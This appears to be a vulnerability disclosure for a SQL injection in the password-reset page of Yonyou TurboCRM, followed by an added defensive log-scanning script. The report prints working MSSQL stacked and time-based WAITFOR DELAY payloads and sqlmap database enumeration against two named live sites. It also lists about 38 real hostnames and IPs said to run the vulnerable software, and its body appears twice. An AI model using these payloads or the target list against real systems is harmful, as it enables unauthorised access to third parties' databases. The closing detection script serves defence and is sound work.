### Brief description:

Injection in a Yonyou general-purpose system

### Details:

Yonyou TurboCRM has a generic SQL injection.

![1111.png](https://images.seebug.org/upload/201405/28191037676a2a737a000d6d5720f19e0181ee30.png)

```
http://www.qinyuancrm.com/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds
```

The loginname parameter is vulnerable to MSSQL time-based blind injection.

```
Place: GET
Parameter: loginname
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'--
---
```

```
[*] master
[*] model
[*] msdb
[*] tempdb
[*] turbocrm60
[*] UFDATA_100_2012
[*] UFMeta_100
[*] UFSystem
```

Then I checked the official CRM; it is affected as well.

![1111.png](https://images.seebug.org/upload/201405/281915402608d7a895bc20b63363bbfcebd57581.png)

```
http://prm.ufida.com.cn/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds

Place: GET
Parameter: loginname
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.13
back-end DBMS: Microsoft SQL Server 2008
```

I searched on Baidu and compiled the following list of sites running this CRM (page title: 用友TurboCRM):

```
218.94.82.23
prm.ufida.com.cn
crm.landwind.com.cn
crm.szclou.com
http://yindajituan.gicp.net:8888
182.135.191.86
111.40.0.242:9091
222.171.32.36:9091
219.90.119.35:8081
180.168.98.94:8088
prm.yonyou.com
www.kdlian.com:8001
prm.chanjet.com
qinyuancrm.com
kfdq369.gicp.net
220.113.5.194
218.84.134.162:8088
turbocrm.yofc.com
crm.elfa.com.cn
crm.pearmain.cn
nc.shineroad.com
crm.westernpower.cn
crm7.abgroup.cn
crm.transn.net
zh4433.vicp.net
218.108.86.226
crm.yiwenkeji.com:8080
218.95.66.88:9036
crm.digisystem.com.cn:8080
crm.shineroad.com
crm.siweidg.com
222.41.174.190:8088
117.36.76.254:8080
hq.longmanschools.com.cn:8080
59.50.33.86:9000
182.135.191.87
crm.szclou.com:8088
58.220.225.28:8080
```

### Proof of vulnerability:

```
http://www.qinyuancrm.com/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds
```

The loginname parameter is vulnerable to MSSQL time-based blind injection.

```
Place: GET
Parameter: loginname
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'--
---
```

```
[*] master
[*] model
[*] msdb
[*] tempdb
[*] turbocrm60
[*] UFDATA_100_2012
[*] UFMeta_100
[*] UFSystem
```

Then I checked the official CRM; it is affected as well.

![1111.png](https://images.seebug.org/upload/201405/281915402608d7a895bc20b63363bbfcebd57581.png)

```
http://prm.ufida.com.cn/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds

Place: GET
Parameter: loginname
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.13
back-end DBMS: Microsoft SQL Server 2008
```
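As an added defender-side example (editor's code, not part of the original report), the script below shows how the MSSQL time-based and stacked-query payloads quoted in the sqlmap output would appear in an Apache access log for `/login/forgetpswd.php`, and flags them. The log lines, client IPs and timestamps are constructed for this example, and the allowlist pattern for a legitimate `loginname` is an assumption about what the application should accept.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines; IPs and timestamps are
# made up. Lines 2 and 3 carry the URL-encoded form of the two payloads
# quoted in the report (stacked WAITFOR DELAY and time-based WAITFOR DELAY).
SAMPLE_LOG = """\
10.0.0.5 - - [28/May/2014:19:10:37 +0800] "GET /login/forgetpswd.php?orgcode=1&loginname=alice HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [28/May/2014:19:10:41 +0800] "GET /login/forgetpswd.php?orgcode=1&loginname=dsdfsfds%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 812 "-" "sqlmap/1.0"
10.0.0.9 - - [28/May/2014:19:10:47 +0800] "GET /login/forgetpswd.php?orgcode=1&loginname=dsdfsfds%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 812 "-" "sqlmap/1.0"
10.0.0.7 - - [28/May/2014:19:11:02 +0800] "GET /login/forgetpswd.php?orgcode=1&loginname=bob.wang HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [28/May/2014:19:11:10 +0800] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp,
# method, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures of the technique shown in the report: an MSSQL WAITFOR DELAY
# time probe, a quote-terminated stacked statement, and a trailing comment.
SIGNATURES = [
    ("mssql_waitfor", re.compile(r"waitfor\s+delay", re.I)),
    ("stacked_query", re.compile(r"'\s*;")),
    ("sql_comment", re.compile(r"--|/\*")),
]

# Assumed shape of a legitimate login name (allowlist, not in the report).
LOGINNAME_RE = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def is_valid_loginname(value: str) -> bool:
    """Allowlist check a hardened forgetpswd handler would apply
    before the value ever reaches a (parameterized) query."""
    return LOGINNAME_RE.fullmatch(value) is not None


def analyze_request(target: str) -> Optional[dict]:
    """Return a finding for a forgetpswd.php request whose loginname
    matches an injection signature or fails the allowlist, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/login/forgetpswd.php"):
        return None
    # parse_qs percent-decodes the values, so the signatures are matched
    # against the same string the PHP handler would see in $_GET.
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    for value in params.get("loginname", []):
        matched = [label for label, rx in SIGNATURES if rx.search(value)]
        if matched or not is_valid_loginname(value):
            hits.append({"value": value, "signatures": matched})
    if not hits:
        return None
    return {"path": parts.path, "hits": hits}


def scan_log(text: str) -> list:
    """Run analyze_request over every parseable line; attach ip and ts."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyze_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        for hit in f["hits"]:
            print(f'{f["ts"]} {f["ip"]} loginname={hit["value"]!r} '
                  f'signatures={hit["signatures"]}')
```

The signature list catches only the specific probe style shown above; the allowlist check is what makes the detector robust to variants, and it mirrors the input validation a fixed `forgetpswd.php` should perform in addition to moving the lookup to a parameterized query, which is the actual fix for this class of bug.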